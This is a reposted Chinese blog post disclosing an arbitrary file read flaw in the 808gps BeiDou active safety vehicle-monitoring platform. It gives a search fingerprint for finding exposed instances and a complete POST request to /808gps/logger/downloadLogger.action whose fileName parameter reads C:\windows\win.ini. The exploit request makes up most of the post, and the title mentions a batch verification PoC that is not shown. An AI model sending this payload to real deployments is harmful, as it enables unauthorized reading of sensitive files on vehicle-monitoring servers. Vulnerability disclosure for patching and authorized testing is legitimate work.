热门标签
热门文章
- 1Linux环境下查看oracle变量,linux下oracle设置环境变量
- 2MYSQL的安装部署_yum install mysql-community-server
- 3华为数据之道第二部分导读
- 4Tensorflow笔记——卷积神经网络_tensorflow卷积神经网络
- 5angular各个版本下载
- 6【二】MATLAB矩阵处理_创建一个5阶魔方矩阵a,求a的行列式值、a的转置矩阵、a的逆矩阵和a的秩,提取矩阵a
- 7关于d3.js 在与ts使用时无类型问题_d3.js ts
- 8给定一个数组,将数组中的元素向右移动 k 个位置,其中 k 是非负数。_数组移动k位
- 9处理多维度变化——桥接模式(四)_在某系统的报表处理模块中
- 10C++数据结构——二叉搜索树迭代器的实现_c++树的迭代器实现
当前位置: article > 正文
北斗主动安全监控平台downloadLogger.action任意文件读取(含批量验证poc)
作者:繁依Fanyi0 | 2024-04-28 03:55:08
赞
踩
北斗主动安全监控平台downloadLogger.action任意文件读取(含批量验证poc)
漏洞描述
北斗主动安全监控平台是一个车辆信息监控平台,该平台存在任意文件读取漏洞,攻击者可以获取敏感信息。
复现环境
body=”808gps”
漏洞复现
POC
- POST /808gps/logger/downloadLogger.action HTTP/1.1
- Host:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
- Content-Length: 27
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
- Accept-Language: zh-CN,zh;q=0.9
- Connection: close
- Content-Type: application/x-www-form-urlencoded
- Accept-Encoding: gzip, deflate
-
- fileName=C:\windows\win.ini
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/繁依Fanyi0/article/detail/500313?site
推荐阅读
相关标签
